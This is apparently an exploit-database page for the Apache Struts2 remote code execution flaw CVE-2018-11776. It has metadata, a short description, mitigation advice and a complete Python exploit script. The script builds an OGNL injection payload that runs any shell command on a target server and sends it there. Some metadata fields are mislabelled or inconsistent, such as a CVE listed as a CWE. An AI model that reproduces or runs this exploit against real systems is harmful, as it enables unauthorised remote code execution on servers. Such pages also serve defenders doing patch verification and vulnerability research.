header-logo
Suggest Exploit
vendor:
Struts2
by:
hook-s3c
8.1
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: Struts2
Affected Version From: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10
Affected Version To: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10
Patch Exists: YES
Related CWE: CVE-2018-11776
CPE: a:apache:struts:2.3.5
Metasploit: https://www.rapid7.com/db/vulnerabilities/struts-cve-2018-11776/
Other Scripts: N/A
Platforms Tested: Linux, Windows, Mac
2018

Struts2 Remote Code Execution Vulnerability

Struts2 Remote Code Execution Vulnerability is a vulnerability in Apache Struts2 which allows an attacker to execute arbitrary code on the server. This exploit uses a malicious OGNL expression to execute arbitrary commands on the server. The exploit is triggered when the vulnerable application receives a malicious request containing the malicious OGNL expression.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of Apache Struts2. Additionally, the application should be configured to use the latest security patches and should be regularly monitored for any suspicious activity.
Source

Exploit-DB raw data:

#!/usr/bin/python
# -*- coding: utf-8 -*-

# hook-s3c (github.com/hook-s3c), @hook_s3c on twitter

import sys
import urllib
import urllib2
import httplib


def exploit(host,cmd):
    print "[Execute]: {}".format(cmd)

    ognl_payload = "${"
    ognl_payload += "(#_memberAccess['allowStaticMethodAccess']=true)."
    ognl_payload += "(#cmd='{}').".format(cmd)
    ognl_payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    ognl_payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd}))."
    ognl_payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    ognl_payload += "(#p.redirectErrorStream(true))."
    ognl_payload += "(#process=#p.start())."
    ognl_payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    ognl_payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    ognl_payload += "(#ros.flush())"
    ognl_payload += "}"

    if not ":" in host:
        host = "{}:8080".format(host)

    # encode the payload
    ognl_payload_encoded = urllib.quote_plus(ognl_payload)

    # further encoding
    url = "http://{}/{}/help.action".format(host, ognl_payload_encoded.replace("+","%20").replace(" ", "%20").replace("%2F","/"))

    print "[Url]: {}\n\n\n".format(url)

    try:
        request = urllib2.Request(url)
        response = urllib2.urlopen(request).read()
    except httplib.IncompleteRead, e:
        response = e.partial
    print response


if len(sys.argv) < 3:
    sys.exit('Usage: %s <host:port> <cmd>' % sys.argv[0])
else:
    exploit(sys.argv[1],sys.argv[2])

Navigation

Suggest Exploit

Services By CQR